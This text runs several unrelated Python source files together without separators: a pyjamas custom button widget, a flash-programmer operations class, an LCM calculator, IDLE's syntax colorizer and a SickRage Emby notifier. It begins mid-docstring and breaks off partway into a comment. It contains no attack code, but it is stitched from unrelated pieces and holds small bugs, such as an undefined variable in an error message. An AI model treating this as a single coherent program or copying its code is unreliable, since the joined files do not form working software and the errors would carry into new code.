contents of another face. For example, if down-hovering does not have defined contents, it will use the contents defined by the down face. The supported faces are defined below: CSS | Getter method | description of face | delegateTo -------------+---------------------+-------------------------------------------+--------- up |getUpFace() |face shown when button is up |none down |getDownFace() |face shown when button is down | up up-hovering |getUpHoveringFace() |face shown when button is up and hovering | up up-disabled |getUpDisabledFace() |face shown when button is up and disabled | up down-hovering|getDownHoveringFace()|face shown when button is down and hovering|down down-disabled|getDownDisabledFace()|face shown when button is down and disabled|down """ class Face: STYLENAME_HTML_FACE = "html-face" def __init__(self, button, delegateTo = None): """ Constructor for Face. Creates a face that delegates to the supplied face. @param delegateTo default content provider """ self.button = button self.delegateTo = delegateTo self.face = None # TODO it is likely required. Im beginner in java/gwt source. self.id = None # TODO self.name = "fazom" # TODO def getName(self): # FIXME """Returns with a known face's name""" return self.name def getFaceID(self): # FIXME """Returns with the face's id""" return self.id def setName(self, name): # FIXME """Sets the face's name""" self.name = name return def setFaceID(self, face_id): # FIXME """Sets the face's id""" self.id = face_id return def getHTML(self): """Gets the face's contents as html.""" return DOM.getInnerHTML(self.getFace()) def getText(self): """Gets the face's contents as text.""" return DOM.getInnerText(self.getFace()) def setHTML(self, html): """Set the face's contents as html.""" self.face = DOM.createDiv() UIObject.setStyleName(self.button, self.face, self.STYLENAME_HTML_FACE, True) DOM.setInnerHTML(self.face, html) self.button.updateButtonFace() def setImage(self, image): """ Set the face's contents as an image. 
@param image image to set as face contents """ self.face = image.getElement() self.button.updateButtonFace() def setText(self, text): """ Sets the face's contents as text. @param text text to set as face's contents """ self.face = DOM.createDiv() UIObject.setStyleName(self.button, self.face, self.STYLENAME_HTML_FACE, True) DOM.setInnerText(self.face, text) self.button.updateButtonFace() def toString(self): return self.getName() def getFace(self): """Gets the contents associated with this face.""" if self.face is None: if self.delegateTo is None: # provide a default face as none was supplied. self.face = DOM.createDiv() return self.face else: return self.delegateTo.getFace() else: return self.face class CustomButton (ButtonBase): """ Represents a button's face. Each face is associated with its own style modifier and, optionally, its own contents html, text, or image. """ STYLENAME_DEFAULT = "gwt-CustomButton" DOWN_ATTRIBUTE = 1 # Pressed Attribute bit. HOVERING_ATTRIBUTE = 2 # Hovering Attribute bit. DISABLED_ATTRIBUTE = 4 # Disabled Attribute bit. UP = 0 # ID for up face. DOWN = DOWN_ATTRIBUTE # 1 ID for down face. UP_HOVERING = HOVERING_ATTRIBUTE # 2 ID for upHovering face. DOWN_HOVERING = DOWN_ATTRIBUTE | HOVERING_ATTRIBUTE # 3 ID for downHovering face. UP_DISABLED = DISABLED_ATTRIBUTE # 4 ID for upDisabled face. DOWN_DISABLED = DOWN | DISABLED_ATTRIBUTE # 5 ID for downDisabled face. """ Calling possibilities: def __init__(self, upImage): def __init__(self, upImage, listener): def __init__(self, upImage, downImage): def __init__(self, upImage, downImage, listener): def __init__(self, upText): def __init__(self, upText, listener): def __init__(self, upText, downText): def __init__(self, upText, downText, listener): def __init__(self): TODO: I do not know how to handle the following cases: def __init__(self, upImage, listener): def __init__(self, upText, listener): So how can I make difference between listener and downImage/downText ? """ def __init__(self, upImageText = None, downImageText=None, listener = None, **kwargs): """Constructor for CustomButton.""" if not kwargs.has_key('StyleName'): kwargs['StyleName']=self.STYLENAME_DEFAULT if kwargs.has_key('Element'): # XXX FIXME: createFocusable is used for a reason... element = kwargs.pop('Element') else: element = Focus.createFocusable() ButtonBase.__init__(self, element, **kwargs) self.curFace = None # The button's current face. self.curFaceElement = None # No "undefined" anymore self.up = None # Face for up. self.down = None # Face for down. self.downHovering = None # Face for downHover. self.upHovering = None # Face for upHover. self.upDisabled = None # Face for upDisabled. self.downDisabled = None # Face for downDisabled. self.isCapturing = False # If True, this widget is capturing with # the mouse held down. self.isFocusing = False # If True, this widget has focus with the space bar down. self.allowClick = False # Used to decide whether to allow clicks to # propagate up to the superclass or container elements. 
self.setUpFace(self.createFace(None, "up", self.UP)) #self.getUpFace().setText("Not initialized yet:)") #self.setCurrentFace(self.getUpFace()) # Add a11y role "button" # XXX: TODO Accessibility # TODO: pyjslib.isinstance if downImageText is None and listener is None: listener = upImageText upImageText = None if upImageText and isinstance(upImageText, str): upText = upImageText upImage = None else: upImage = upImageText upText = None if downImageText and isinstance(downImageText, str): downText = downImageText downImage = None else: downImage = downImageText downText = None #self.getUpFace().setText("Just a test") if upImage: self.getUpFace().setImage(upImage) if upText: self.getUpFace().setText(upText) if downImage: self.getDownFace().setImage(downImage) if downText: self.getDownFace().setText(downText) # set the face DOWN #self.setCurrentFace(self.getDownFace()) # set the face UP #self.setCurrentFace(self.getUpFace()) self.sinkEvents(Event.ONCLICK | Event.MOUSEEVENTS | Event.FOCUSEVENTS | Event.KEYEVENTS) if listener: self.addClickListener(listener) def updateButtonFace(self): if self.curFace is not None and \ self.curFace.getFace() == self.getFace(): self.setCurrentFaceElement(self.face) def getDownDisabledFace(self): """Gets the downDisabled face of the button.""" if self.downDisabled is None: self.setDownDisabledFace(self.createFace(self.getDownFace(), "down-disabled", self.DOWN_DISABLED)) return self.downDisabled def getDownFace(self): """Gets the down face of the button.""" if self.down is None: self.setDownFace(self.createFace(self.getUpFace(), "down", self.DOWN)) return self.down def getDownHoveringFace(self): """Gets the downHovering face of the button.""" if self.downHovering is None: self.setDownHoveringFace(self.createFace(self.getDownFace(), "down-hovering", self.DOWN_HOVERING)) return self.downHovering def getHTML(self): """Gets the current face's html.""" return self.getCurrentFace().getHTML() def getTabIndex(self): return Focus.getTabIndex(self.getElement()) def getText(self): """Gets the current face's text.""" return self.getCurrentFace().getText() def getUpDisabledFace(self): """Gets the upDisabled face of the button.""" if self.upDisabled is None: self.setUpDisabledFace(self.createFace(self.getUpFace(), "up-disabled", self.UP_DISABLED)) return self.upDisabled def getUpFace(self): """Gets the up face of the button.""" return self.up # self.up must be always initialized def getUpHoveringFace(self): """Gets the upHovering face of the button.""" if self.upHovering is None: self.setUpHoveringFace(self.createFace(self.getUpFace(), "up-hovering", self.UP_HOVERING)) return self.upHovering def onBrowserEvent(self, event): # Should not act on button if disabled. if not self.isEnabled(): # This can happen when events are bubbled up from # non-disabled children return event_type = DOM.eventGetType(event) if event_type == "click": # If clicks are currently disallowed, keep it from bubbling or # being passed to the superclass. 
if not self.allowClick: DOM.eventStopPropagation(event) return elif event_type == "mousedown": if DOM.eventGetButton(event) == Event.BUTTON_LEFT: self.setFocus(True) self.onClickStart() DOM.setCapture(self.getElement()) self.isCapturing = True # Prevent dragging (on some browsers) DOM.eventPreventDefault(event) elif event_type == "mouseup": if self.isCapturing: self.isCapturing = False DOM.releaseCapture(self.getElement()) if self.isHovering() and \ DOM.eventGetButton(event) == Event.BUTTON_LEFT: self.onClick() elif event_type == "mousemove": if self.isCapturing: # Prevent dragging (on other browsers) DOM.eventPreventDefault(event) elif event_type == "mouseout": to = DOM.eventGetToElement(event) if (DOM.isOrHasChild(self.getElement(), DOM.eventGetTarget(event)) and (to is None or not DOM.isOrHasChild(self.getElement(), to))): if self.isCapturing: self.onClickCancel() self.setHovering(False) elif event_type == "mouseover": if DOM.isOrHasChild(self.getElement(), DOM.eventGetTarget(event)): self.setHovering(True) if self.isCapturing: self.onClickStart() elif event_type == "blur": if self.isFocusing: self.isFocusing = False self.onClickCancel() elif event_type == "losecapture": if self.isCapturing: self.isCapturing = False self.onClickCancel() ButtonBase.onBrowserEvent(self, event) # Synthesize clicks based on keyboard events AFTER the normal # key handling. if (DOM.eventGetTypeInt(event) & Event.KEYEVENTS) != 0: keyCode = DOM.eventGetKeyCode(event) if event_type == "keydown": if keyCode == ' ': self.isFocusing = True self.onClickStart() elif event_type == "keyup": if self.isFocusing and keyCode == ' ': self.isFocusing = False self.onClick() elif event_type == "keypress": if keyCode == '\n' or keyCode == '\r': self.onClickStart() self.onClick() def setAccessKey(self, key): # TODO: accessibility # Focus.setAccessKey(self.getElement(), key) pass def setEnabled(self, enabled): """Sets whether this button is enabled.""" if self.isEnabled() != enabled: self.toggleDisabled() ButtonBase.setEnabled(self, enabled) if not enabled: self.cleanupCaptureState() # XXX - TODO: Accessibility else: self.setAriaPressed(self.getCurrentFace()) def setFocus(self, focused): if focused: Focus.focus(self.getElement()) else: Focus.blur(self.getElement()) def setHTML(self, html): """Sets the current face's html.""" self.getCurrentFace().setHTML(html) def setTabIndex(self, index): Focus.setTabIndex(self.getElement(), index) def setText(self, text): """Sets the current face's text.""" self.getCurrentFace().setText(text) def isDown(self): """Is this button down?""" # 0->0, 1->1, 2->0, 3->1, 4->0, 5->1 return (self.DOWN_ATTRIBUTE & self.getCurrentFace().getFaceID()) > 0 def onAttach(self): """ Overridden on attach to ensure that a button face has been chosen before the button is displayed. """ self.finishSetup() ButtonBase.onAttach(self) def onClick(self, sender=None): """ Called when the user finishes clicking on this button. The default behavior is to fire the click event to listeners. Subclasses that override onClickStart() should override this method to restore the normal widget display. """ # Allow the click we're about to synthesize to pass through to the # superclass and containing elements. Element.dispatchEvent() is # synchronous, so we simply set and clear the flag within this method. self.allowClick = True # Mouse coordinates are not always available (e.g., when the click is # caused by a keyboard event). 
evt = None # we NEED to initialize evt, to be in the same namespace # as the evt *inside* of JS block # We disallow setting the button here, because IE doesn't provide the # button property for click events. # there is a good explanation about all the arguments of initMouseEvent # at: https://developer.mozilla.org/En/DOM:event.initMouseEvent DOM.buttonClick(self.getElement()) self.allowClick = False def onClickCancel(self): """ Called when the user aborts a click in progress; for example, by dragging the mouse outside of the button before releasing the mouse button. Subclasses that override onClickStart() should override this method to restore the normal widget display. """ pass def onClickStart(self): """ Called when the user begins to click on this button. Subclasses may override this method to display the start of the click visually; such subclasses should also override onClick() and onClickCancel() to restore normal visual state. Each onClickStart will eventually be followed by either onClick or onClickCancel, depending on whether the click is completed. """ pass def onDetach(self): ButtonBase.onDetach(self) self.cleanupCaptureState() def setDown(self, down): """Sets whether this button is down.""" if down != self.isDown(): self.toggleDown() def finishSetup(self): #default """Common setup between constructors.""" if self.curFace is None: self.setCurrentFace(self.getUpFace()) def fireClickListeners(self, nativeEvent): # TODO(ecc) Once event triggering is committed, should fire a # click event instead. self.fireEvent(ClickEvent()) # TODO: ??? def fireEvent(self): # TODO: there is no standard mechanism in pyjamas? pass def getCurrentFace(self): """ Gets the current face of the button. Implementation note: Package so we can use it when testing the button. """ self.finishSetup() return self.curFace def isHovering(self): """Is the mouse hovering over this button? Returns True""" return (self.HOVERING_ATTRIBUTE & self.getCurrentFace().getFaceID()) > 0 def setHovering(self, hovering): """Sets whether this button is hovering.""" if hovering != self.isHovering(): # TODO self.toggleHover() def toggleDown(self): """Toggle the up/down attribute.""" newFaceID = self.getCurrentFace().getFaceID() ^ self.DOWN_ATTRIBUTE self.setCurrentFaceFromID(newFaceID) # newFaceId: 0,1,2,3,4,5 def cleanupCaptureState(self): """ Resets internal state if this button can no longer service events. This can occur when the widget becomes detached or disabled. """ if self.isCapturing or self.isFocusing: DOM.releaseCapture(self.getElement()) self.isCapturing = False self.isFocusing = False self.onClickCancel() def createFace(self, delegateTo, name, faceID): # TODO: name and faceID # TODO: maybe no need to break it into this pieces face = Face(self, delegateTo) face.setName(name) face.setFaceID(faceID) return face def getFaceFromID(self, face_id): if (face_id == self.DOWN): return self.getDownFace() elif(face_id == self.UP): return self.getUpFace() elif (face_id == self.DOWN_HOVERING): return self.getDownHoveringFace() elif (face_id == self.UP_HOVERING): return self.getUpHoveringFace() elif (face_id == self.UP_DISABLED): return self.getUpDisabledFace() elif (face_id == self.DOWN_DISABLED): return self.getDownDisabledFace() else: print id, " is not a known face id." # TODO ??? 
    def setAriaPressed(self, newFace):
        pressed = (newFace.getFaceID() & self.DOWN_ATTRIBUTE) == 1
        # XXX: TODO Accessibility

    def setCurrentFace(self, newFace):
        """Implementation note: default access for testing."""
        if self.curFace != newFace:
            if self.curFace is not None:
                self.removeStyleDependentName(self.curFace.getName())
            self.curFace = newFace
            self.setCurrentFaceElement(newFace.getFace())
            self.addStyleDependentName(self.curFace.getName())
            if self.isEnabled():
                self.setAriaPressed(newFace)
            #self.updateButtonFace() # TODO: should we comment out?
            self.style_name = self.getStyleName()

    def setCurrentFaceFromID(self, faceID):
        """Sets the current face based on the faceID."""
        # This is a new method compared to GWT. Likely to be removed.
        newFace = self.getFaceFromID(faceID)
        self.setCurrentFace(newFace)

    def setCurrentFaceElement(self, newFaceElement):
        # XXX: TODO
        if self.curFaceElement != newFaceElement:
            if self.curFaceElement is not None:
                DOM.removeChild(self.getElement(), self.curFaceElement)
            self.curFaceElement = newFaceElement
            DOM.appendChild(self.getElement(), self.curFaceElement)

    def setDownDisabledFace(self, downDisabled):
        """Sets the downDisabled face of the button."""
        self.downDisabled = downDisabled

    def setDownFace(self, down):
        """Sets the down face of the button."""
        self.down = down

    def setDownHoveringFace(self, downHovering):
        """Sets the downHovering face of the button."""
        self.downHovering = downHovering

    def setUpDisabledFace(self, upDisabled):
        """Sets the upDisabled face of the button."""
        self.upDisabled = upDisabled

    def setUpFace(self, up):
        """Sets the up face of the button."""
        self.up = up

    def setUpHoveringFace(self, upHovering):
        """Sets the upHovering face of the button."""
        self.upHovering = upHovering

    def toggleDisabled(self):
        """Toggle the disabled attribute."""
        # Toggle disabled.
        newFaceID = self.getCurrentFace().getFaceID() ^ self.DISABLED_ATTRIBUTE
        # Remove hovering.
        newFaceID &= ~self.HOVERING_ATTRIBUTE
        # Set the current face.
        self.setCurrentFaceFromID(newFaceID)

    def toggleHover(self):
        """Toggle the hovering attribute."""
        # Toggle hovering.
        newFaceID = self.getCurrentFace().getFaceID() ^ self.HOVERING_ATTRIBUTE
        # Remove disabled.
        newFaceID &= ~self.DISABLED_ATTRIBUTE
        self.setCurrentFaceFromID(newFaceID)

Factory.registerClass('pyjamas.ui.CustomButton', CustomButton)
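# Illustrative sketch (not part of pyjamas): the face IDs on CustomButton are
# plain bit flags, so switching faces is just XOR/AND arithmetic.  This
# standalone snippet mirrors toggleDown() and toggleHover() without needing a
# DOM or a Focus element.
_DOWN, _HOVERING, _DISABLED = 1, 2, 4

def _toggle_down(face_id):
    # Same operation as CustomButton.toggleDown()
    return face_id ^ _DOWN

def _toggle_hover(face_id):
    # Same operation as CustomButton.toggleHover(): flip hover, clear disabled
    return (face_id ^ _HOVERING) & ~_DISABLED

if __name__ == '__main__':
    face = 0                    # UP
    face = _toggle_down(face)   # 1 -> DOWN
    face = _toggle_hover(face)  # 3 -> DOWN_HOVERING
    print(face)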
import binascii import hexutils from ihex import IHex import os.path from pgm_error import PgmError from protocol import Protocol import time class Operations: def __init__(self, part, io, sync=True): """part - Part object, io - *IO object. If sync is True do protocol synchronization (if supported by device.""" self._part = part self._io = io protocolPath = self._part.getProtocolFileName(self._io.getHardware()) protocolPath = os.path.join('ProtocolDescriptionFiles', protocolPath) self._protocol = Protocol(protocolPath) self._wdelay = 1 """Write delay hack""" if sync: self.opSync() def _opDotOperation(self, operation, **argv): """Common function for operation with no result.""" cmd = self._protocol.getCmd(operation, **argv) self._opDotCmd(cmd) def _opDotCmd(self, cmd): """Common function for operation with no result.""" self._io.send(cmd) data = self._io.recv() if data != '.': raise PgmError("Invalid response, expected '.' got: %s" % data) def opBlankCheck(self, addr_start, size=None): if size is None: size = self._part.getMemory('FLASH').getSize() - addr_start addr = addr_start addr_hi_prev = None while size > 0: addr_hi, addr_lo = divmod(addr, 0x10000) if addr_hi != addr_hi_prev: addr_hi_prev = addr_hi cmd = self._protocol.getCmd('select_memory_page', PPPP=addr_hi) self._opDotCmd(cmd) addr_end = addr_lo + size - 1 if addr_end >= 0x10000: addr_end = 0xffff cmd = self._protocol.getCmd('blank_check', PPPP=addr_lo, QQQQ=addr_end) self._opDotCmd(cmd) addr = addr_hi * 0x10000 + addr_end + 1 size = size - (addr_end - addr_lo + 1) def opErase(self): self._opDotOperation('erase') self._wdelayHack() def opMemory(self, name): self._memory_name = name operation = 'select_memory_' + name.lower() self._opDotOperation(operation) def opProgram(self, data, addr_start=0): addr_hi_prev = None addr = addr_start while data: addr_hi, addr_lo = divmod(addr, 0x10000) if addr_hi != addr_hi_prev: addr_hi_prev = addr_hi cmd = self._protocol.getCmd('select_memory_page', PPPP=addr_hi) self._opDotCmd(cmd) addr_end = addr_lo + len(data) if addr_end >= 0x10000: addr_end = 0xffff size = addr_end + 1 - addr_lo buf, data = data[:size], data[size:] cmd = self._protocol.getCmd('program_start', PPPP=addr_lo, QQQQ=addr_end) self._opDotCmd(cmd) self._wdelayHack() addr = addr + size # send data ihex = IHex() ihex.insert_data(addr_lo, buf) ihex.set_row_bytes(255) buf = ihex.write() # split to lines, remove, empty strings buf = [b for b in buf.splitlines() if b] # remove hex end if file buf = buf[:-1] for d in buf: self._opDotCmd(str(d, 'ascii').upper()) self._wdelayHack() def opRead(self, addr_start, size=None): if size is None: addr_stop = self._part.getMemory(self._memory_name).getSize() else: addr_stop = addr_start + size page_size = self._part.getPageSize() data = '' addr = addr_start addr_hi_prev = None while addr < addr_stop: addr_hi, addr_lo = divmod(addr, 0x10000) if addr_hi != addr_hi_prev: addr_hi_prev = addr_hi cmd = self._protocol.getCmd('select_memory_page', PPPP=addr_hi) self._opDotCmd(cmd) addr_end = addr_lo + page_size - 1 if addr_end > addr_stop: addr_end = addr_stop - 1 if addr_end >= 0x10000: addr_end = 0x10000 - 1 cmd = self._protocol.getCmd('read_memory', PPPP=addr_lo, QQQQ=addr_end) self._io.send(cmd) r_addr = addr while addr_lo <= addr_end: buf = self._io.recv() # AAAA=ddddddd.... r_addr, r_eq, r_data = buf[:4], buf[4:5], buf[5:] if r_eq != '=': raise PgmError("Expected 'xxxx=...' 
in :%s" % buf) if r_addr != ("%.4X" % addr_lo): raise PgmError("Invalid address in response got: %s exp: %s data: %s" % (r_addr, addr_lo, bug)) addr_lo = addr_lo + len(r_data) / 2 data = data + r_data addr = addr_hi * 0x10000 + addr_end + 1 return binascii.unhexlify(data) def opStartAppl(self, reset): if reset: cmd = self._protocol.getCmd('startAppliWithReset') else: cmd = self._protocol.getCmd('startAppliWithoutReset') self._io.send(cmd) # read \x00 if follows by reset, or timeout self._io.readRaw(1) def opSync(self): """Called only once to synchronize bytestream.""" if self._protocol.hasCmd('sync'): sync = self._protocol.getCmd('sync') sync = bytes(sync, 'ascii') self._io.writeRaw(sync) r = self._io.readRaw(len(sync)) if r != sync: raise PgmError('Synchronization failed, invalid response: %s' % r) def _wdelayHack(self): time.sleep(self._wdelay)
# Farooqui Conjecture.py
# Imaad Farooqui
# Farooqui Conjecture LCM

# Modules
import math
from time import sleep

# LCM Function
def LCM(num1, num2):
    stop = 0 # Set Variables
    # Find biggest value
    if(num1 > num2):
        maximum = math.ceil(0.5 * num1)
        bigger = 1
    else:
        maximum = math.ceil(0.5 * num2)
        bigger = 2
    # Check if x goes into y
    if(bigger == 1):
        if(num1 % num2 == 0):
            x = num1
            print(x)
            stop = 1
    else:
        if(num2 % num1 == 0):
            x = num2
            print(x)
            stop = 1
    while(stop == 0): # Loop until a common divisor is found
        if(num1 % maximum == 0 and num2 % maximum == 0): # Check for common divisor
            a = maximum
            break
        maximum = maximum - 1 # Decrease value of maximum
        if(maximum == 1):
            a = 1
            break
    # Output if not already calculated
    if(stop == 0): # If not already calculated
        if(a == 1):
            print(num1 * num2) # x * y
        else:
            print((num1 // a) * (num2 // a) * a) # (x / a) * (y / a) * a

while(1 == 1): # Main input loop
    # Variable Setup
    choicea = 0
    choiceb = 0
    # User Input
    ## Choice 1
    while(choicea < 1 or choicea % 1 != 0):
        choicea = float(input("Choose your first integer.\n"))
    ## Choice 2
    while(choiceb < 1 or choiceb % 1 != 0):
        choiceb = float(input("Choose your second integer.\n"))
    # Perform LCM Function
    LCM(int(choicea), int(choiceb))
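# Cross-check (illustrative, not part of the original script): the routine
# above computes LCM(x, y) as (x // a) * (y // a) * a, where a is the greatest
# common divisor it finds by counting down.  Euclid's algorithm via math.gcd
# gives the same answer directly and is a handy sanity check.
import math

def lcm_euclid(x, y):
    return x * y // math.gcd(x, y)

if __name__ == '__main__':
    for x, y in [(4, 6), (12, 18), (7, 5)]:
        print(x, y, lcm_euclid(x, y))   # 12, 36, 35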
import time import re import keyword import __builtin__ from Tkinter import * from idlelib.Delegator import Delegator from idlelib.configHandler import idleConf DEBUG = False def any(name, alternates): "Return a named group pattern matching list of alternates." return "(?P<%s>" % name + "|".join(alternates) + ")" def make_pat(): kw = r"\b" + any("KEYWORD", keyword.kwlist) + r"\b" builtinlist = [str(name) for name in dir(__builtin__) if not name.startswith('_')] # self.file = file("file") : # 1st 'file' colorized normal, 2nd as builtin, 3rd as string builtin = r"([^.'\"\\#]\b|^)" + any("BUILTIN", builtinlist) + r"\b" comment = any("COMMENT", [r"#[^\n]*"]) stringprefix = r"(\br|u|ur|R|U|UR|Ur|uR|b|B|br|Br|bR|BR)?" sqstring = stringprefix + r"'[^'\\\n]*(\\.[^'\\\n]*)*'?" dqstring = stringprefix + r'"[^"\\\n]*(\\.[^"\\\n]*)*"?' sq3string = stringprefix + r"'''[^'\\]*((\\.|'(?!''))[^'\\]*)*(''')?" dq3string = stringprefix + r'"""[^"\\]*((\\.|"(?!""))[^"\\]*)*(""")?' string = any("STRING", [sq3string, dq3string, sqstring, dqstring]) return kw + "|" + builtin + "|" + comment + "|" + string +\ "|" + any("SYNC", [r"\n"]) prog = re.compile(make_pat(), re.S) idprog = re.compile(r"\s+(\w+)", re.S) asprog = re.compile(r".*?\b(as)\b") class ColorDelegator(Delegator): def __init__(self): Delegator.__init__(self) self.prog = prog self.idprog = idprog self.asprog = asprog self.LoadTagDefs() def setdelegate(self, delegate): if self.delegate is not None: self.unbind("<<toggle-auto-coloring>>") Delegator.setdelegate(self, delegate) if delegate is not None: self.config_colors() self.bind("<<toggle-auto-coloring>>", self.toggle_colorize_event) self.notify_range("1.0", "end") def config_colors(self): for tag, cnf in self.tagdefs.items(): if cnf: self.tag_configure(tag, **cnf) self.tag_raise('sel') def LoadTagDefs(self): theme = idleConf.GetOption('main','Theme','name') self.tagdefs = { "COMMENT": idleConf.GetHighlight(theme, "comment"), "KEYWORD": idleConf.GetHighlight(theme, "keyword"), "BUILTIN": idleConf.GetHighlight(theme, "builtin"), "STRING": idleConf.GetHighlight(theme, "string"), "DEFINITION": idleConf.GetHighlight(theme, "definition"), "SYNC": {'background':None,'foreground':None}, "TODO": {'background':None,'foreground':None}, "BREAK": idleConf.GetHighlight(theme, "break"), "ERROR": idleConf.GetHighlight(theme, "error"), # The following is used by ReplaceDialog: "hit": idleConf.GetHighlight(theme, "hit"), } if DEBUG: print 'tagdefs',self.tagdefs def insert(self, index, chars, tags=None): index = self.index(index) self.delegate.insert(index, chars, tags) self.notify_range(index, index + "+%dc" % len(chars)) def delete(self, index1, index2=None): index1 = self.index(index1) self.delegate.delete(index1, index2) self.notify_range(index1) after_id = None allow_colorizing = True colorizing = False def notify_range(self, index1, index2=None): self.tag_add("TODO", index1, index2) if self.after_id: if DEBUG: print "colorizing already scheduled" return if self.colorizing: self.stop_colorizing = True if DEBUG: print "stop colorizing" if self.allow_colorizing: if DEBUG: print "schedule colorizing" self.after_id = self.after(1, self.recolorize) close_when_done = None # Window to be closed when done colorizing def close(self, close_when_done=None): if self.after_id: after_id = self.after_id self.after_id = None if DEBUG: print "cancel scheduled recolorizer" self.after_cancel(after_id) self.allow_colorizing = False self.stop_colorizing = True if close_when_done: if not self.colorizing: close_when_done.destroy() else: 
self.close_when_done = close_when_done def toggle_colorize_event(self, event): if self.after_id: after_id = self.after_id self.after_id = None if DEBUG: print "cancel scheduled recolorizer" self.after_cancel(after_id) if self.allow_colorizing and self.colorizing: if DEBUG: print "stop colorizing" self.stop_colorizing = True self.allow_colorizing = not self.allow_colorizing if self.allow_colorizing and not self.colorizing: self.after_id = self.after(1, self.recolorize) if DEBUG: print "auto colorizing turned",\ self.allow_colorizing and "on" or "off" return "break" def recolorize(self): self.after_id = None if not self.delegate: if DEBUG: print "no delegate" return if not self.allow_colorizing: if DEBUG: print "auto colorizing is off" return if self.colorizing: if DEBUG: print "already colorizing" return try: self.stop_colorizing = False self.colorizing = True if DEBUG: print "colorizing..." t0 = time.clock() self.recolorize_main() t1 = time.clock() if DEBUG: print "%.3f seconds" % (t1-t0) finally: self.colorizing = False if self.allow_colorizing and self.tag_nextrange("TODO", "1.0"): if DEBUG: print "reschedule colorizing" self.after_id = self.after(1, self.recolorize) if self.close_when_done: top = self.close_when_done self.close_when_done = None top.destroy() def recolorize_main(self): next = "1.0" while True: item = self.tag_nextrange("TODO", next) if not item: break head, tail = item self.tag_remove("SYNC", head, tail) item = self.tag_prevrange("SYNC", head) if item: head = item[1] else: head = "1.0" chars = "" next = head lines_to_get = 1 ok = False while not ok: mark = next next = self.index(mark + "+%d lines linestart" % lines_to_get) lines_to_get = min(lines_to_get * 2, 100) ok = "SYNC" in self.tag_names(next + "-1c") line = self.get(mark, next) ##print head, "get", mark, next, "->", repr(line) if not line: return for tag in self.tagdefs.keys(): self.tag_remove(tag, mark, next) chars = chars + line m = self.prog.search(chars) while m: for key, value in m.groupdict().items(): if value: a, b = m.span(key) self.tag_add(key, head + "+%dc" % a, head + "+%dc" % b) if value in ("def", "class"): m1 = self.idprog.match(chars, b) if m1: a, b = m1.span(1) self.tag_add("DEFINITION", head + "+%dc" % a, head + "+%dc" % b) elif value == "import": # color all the "as" words on same line, except # if in a comment; cheap approximation to the # truth if '#' in chars: endpos = chars.index('#') else: endpos = len(chars) while True: m1 = self.asprog.match(chars, b, endpos) if not m1: break a, b = m1.span(1) self.tag_add("KEYWORD", head + "+%dc" % a, head + "+%dc" % b) m = self.prog.search(chars, m.end()) if "SYNC" in self.tag_names(next + "-1c"): head = next chars = "" else: ok = False if not ok: # We're in an inconsistent state, and the call to # update may tell us to stop. It may also change # the correct value for "next" (since this is a # line.col string, not a true mark). So leave a # crumb telling the next invocation to resume here # in case update tells us to leave. self.tag_add("TODO", next) self.update() if self.stop_colorizing: if DEBUG: print "colorizing stopped" return def removecolors(self): for tag in self.tagdefs.keys(): self.tag_remove(tag, "1.0", "end") def main(): from idlelib.Percolator import Percolator root = Tk() root.wm_protocol("WM_DELETE_WINDOW", root.quit) text = Text(background="white") text.pack(expand=1, fill="both") text.focus_set() p = Percolator(text) d = ColorDelegator() p.insertfilter(d) root.mainloop() if __name__ == "__main__": main()
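# Illustrative, self-contained sketch (not part of idlelib): recolorize_main()
# works by scanning text with one big alternation of named groups, exactly as
# make_pat() builds above.  A miniature version of the same idea:
import re as _re

_demo_pat = _re.compile(
    r"(?P<KEYWORD>\b(?:def|class|return)\b)"
    r"|(?P<COMMENT>#[^\n]*)"
    r"|(?P<STRING>'[^'\n]*')")

def _demo_colorize(text):
    """Return (tag, matched_text) pairs, mimicking the tag_add() calls above."""
    spans = []
    for m in _demo_pat.finditer(text):
        for name, value in m.groupdict().items():
            if value:
                spans.append((name, value))
    return spans

if __name__ == "__main__":
    print(_demo_colorize("def spam(): # say hello\n    return 'hi'"))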
# Author: Nic Wolfe <[email protected]> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import urllib import urllib2 import sickbeard from sickbeard import logger from sickbeard.exceptions import ex try: import json except ImportError: import simplejson as json class EMBYNotifier: def _notify_emby(self, message, host=None, emby_apikey=None): """Handles notifying Emby host via HTTP API Returns: Returns True for no issue or False if there was an error """ # fill in omitted parameters if not host: host = sickbeard.EMBY_HOST if not emby_apikey: emby_apikey = sickbeard.EMBY_APIKEY url = 'http://%s/emby/Notifications/Admin' % (host) values = {'Name': 'SickRage', 'Description': message, 'ImageUrl': 'https://raw.githubusercontent.com/SiCKRAGETV/SickRage/master/gui/slick/images/sickrage-shark-mascot.png'} data = json.dumps(values) try: req = urllib2.Request(url, data) req.add_header('X-MediaBrowser-Token', emby_apikey) req.add_header('Content-Type', 'application/json') response = urllib2.urlopen(req) result = response.read() response.close() logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG) return True except (urllib2.URLError, IOError), e: logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING) return False ############################################################################## # Public functions ############################################################################## def test_notify(self, host, emby_apikey): return self._notify_emby('This is a test notification from SickRage', host, emby_apikey) def update_library(self, show=None): """Handles updating the Emby Media Server host via HTTP API Returns: Returns True for no issue or False if there was an error """ if sickbeard.USE_EMBY: if not sickbeard.EMBY_HOST: logger.log(u'EMBY: No host specified, check your settings', logger.DEBUG) return False if show: if show.indexer == 1: provider = 'tvdb' elif show.indexer == 2: logger.log(u'EMBY: TVRage Provider no longer valid', logger.WARNING) return False else: logger.log(u'EMBY: Provider unknown', logger.WARNING) return False query = '?%sid=%s' % (provider, show.indexerid) else: query = '' url = 'http://%s/emby/Library/Series/Updated%s' % (sickbeard.EMBY_HOST, query) values = {} data = urllib.urlencode(values) try: req = urllib2.Request(url, data) req.add_header('X-MediaBrowser-Token', sickbeard.EMBY_APIKEY) response = urllib2.urlopen(req) result = response.read() response.close() logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG) return True except (urllib2.URLError, IOError), e: logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING) return False notifier = EMBYNotifier
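# Illustrative, standalone sketch (not part of SickRage): the notifier above
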